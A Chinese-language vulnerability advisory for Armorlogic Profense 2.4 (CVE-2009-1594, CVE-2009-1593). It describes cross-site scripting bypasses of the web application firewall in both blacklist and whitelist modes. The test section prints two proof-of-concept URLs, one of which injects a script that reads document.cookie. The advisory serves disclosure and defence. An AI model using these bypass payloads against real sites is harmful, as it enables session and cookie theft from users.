受影响系统:
Armorlogic Profense 2.4
不受影响系统:
Armorlogic Profense 2.4.4
Armorlogic Profense 2.2.22
描述:
BUGTRAQ ID: 35053
CVE(CAN) ID: CVE-2009-1594,CVE-2009-1593
Profense是集成了负载均衡技术的Web应用防火墙。
配置为negative model模式(黑名单)和positive模式(白名单)的Profense Web应用防火墙中存在多个跨站脚本攻击,远程攻击者可以通过在URL请求中包含修改过的SCRIPT元素结尾标签或%0A(编码的换行符)绕过XSS保护机制,在用户浏览器会话中执行任意代码。
<*来源:Sandro Gauci
Wendel Guglielmetti Henrique
链接:http://marc.info/?l=bugtraq&m=124283682213116&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/phptest/xss.php?var=%3CEvil%20script%20goes%20here%3E=%0AByPass
http://www.example.com/phptest/xss.php?var=%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E
建议:
厂商补丁:
Armorlogic
———-
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
0 条评论。